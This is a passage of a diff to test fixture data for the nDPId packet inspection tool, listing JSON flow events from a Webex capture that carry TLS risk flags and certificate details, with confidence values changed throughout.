{"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00933{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1536,"source":"webex.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570732086,"flow_last_seen":1444570733112,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":7,"midstream":0,"thread_ts_msec":1444570733112,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51190,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1444570738415,"flow_last_seen":1444570738415,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570738415,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1544,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1444570738415,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1444570738415,"pkt":"ABoRAAACABoRAAABCABFAAA8pZ5AAEAGbC8KCAABPm3geMf6AbsEHk9CAAAAAKACOQjdywAAAgQFtAQCCAoATOrcAAAAAAEDAwY="} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1545,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1444570738418,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738418,"pkt":"ABoRAAACABoRAAABCABFAAAoA+9AABAGPfM+beB4CggAAQG7x\/r74bC9BB5PQ1AS\/\/+9LQAA"} 
@@ -316,70 +316,70 @@ 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1547,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1444570738422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoA\/BAABAGPfI+beB4CggAAQG7x\/s\/nm3KwGGSNlAS\/\/+9LAAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1548,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAopZ9AAEAGbEIKCAABPm3geMf6AbsEHk9D++GwvlAQOQiEJgAA"} 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1549,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1444570738422,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1444570738422,"pkt":"ABoRAAACABoRAAABCABFAAAoeOpAAEAGmPcKCAABPm3geMf7AbvAYZI2P55ty1AQOQiEJQAA"} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or 
older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS 
Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} -00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570637191,"flow_last_seen":1444570733113,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":14432,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1550,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738415,"flow_last_seen":1444570738424,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738424,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+00934{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1552,"source":"webex.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1444570738419,"flow_last_seen":1444570738426,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":15,"midstream":0,"thread_ts_msec":1444570738426,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51195,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1562,"source":"webex.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1444570738415,"flow_last_seen":1444570740300,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":661,"midstream":0,"thread_ts_msec":1444570740300,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.224.120","src_port":51194,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"},"tls": 
{"version":"TLSv1","client_requested_server_name":"","server_names":"*.webex.com","ja3":"7cb93b2404a98399e9f84c74fef1fb8f","ja3s":"91589ea825a2ee41810c85fab06d2ef6","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_256_CBC_SHA","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=us, ST=California, L=San Jose, O=Cisco Systems, Inc., OU=CSG, CN=*.webex.com","fingerprint":"61:C9:DE:EE:FA:AE:DC:17:A0:36:B9:68:F9:17:F6:5A:90:7B:14:E1"}} +00671{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1444570699096,"flow_last_seen":1444570740249,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":536,"flow_tot_l4_payload_len":1123,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59756,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1444570699101,"flow_last_seen":1444570740248,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":497,"flow_tot_l4_payload_len":831,"flow_avg_l4_payload_len":83,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"78.46.237.91","src_port":59757,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 
+00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1444570637191,"flow_last_seen":1444570733113,"flow_idle_time":200000,"flow_min_l4_payload_len":656,"flow_max_l4_payload_len":656,"flow_tot_l4_payload_len":14432,"flow_avg_l4_payload_len":656,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"172.16.1.75","src_port":64538,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636264,"flow_last_seen":1444570640345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.99","src_port":55969,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
+00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1444570636155,"flow_last_seen":1444570639261,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":4355,"flow_avg_l4_payload_len":256,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51646,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1444570640298,"flow_last_seen":1444570645704,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":63,"flow_avg_l4_payload_len":5,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.204.49","src_port":51676,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00917{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":14,"flow_first_seen":1444570636160,"flow_last_seen":1444570639259,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7020,"flow_avg_l4_payload_len":501,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"209.197.222.159","src_port":47498,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570675941,"flow_last_seen":1444570690940,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51833,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00579{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1444570694561,"flow_last_seen":1444570709697,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":187,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":23,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51839,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": 
{"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} +00916{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1444570716599,"flow_last_seen":1444570737975,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":7640,"flow_avg_l4_payload_len":152,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51857,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"6":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 00642{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"2":"Match by IP"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
00574{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1444570719041,"flow_last_seen":1444570720045,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.229.158","src_port":51859,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00914{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":16,"flow_first_seen":1444570636180,"flow_last_seen":1444570636961,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2527,"flow_tot_l4_payload_len":7084,"flow_avg_l4_payload_len":442,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"62.109.231.3","src_port":45814,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} 
-00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1444570636259,"flow_last_seen":1444570640345,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3939,"flow_tot_l4_payload_len":4387,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"64.68.121.100","src_port":52219,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Webex","breed":"Acceptable","category":"VoIP"}} -00915{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":1580,"source":"webex.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":11,"flow_first_seen":1444570636270,"flow_last_seen":1444570640346,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3907,"flow_tot_l4_payload_len":3970,"flow_avg_l4_payload_len":360,"midstream":0,"thread_ts_msec":1444570742172,"l3_proto":"ip4","src_ip":"10.8.0.1","dst_ip":"114.29.200.11","src_port":47841,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": 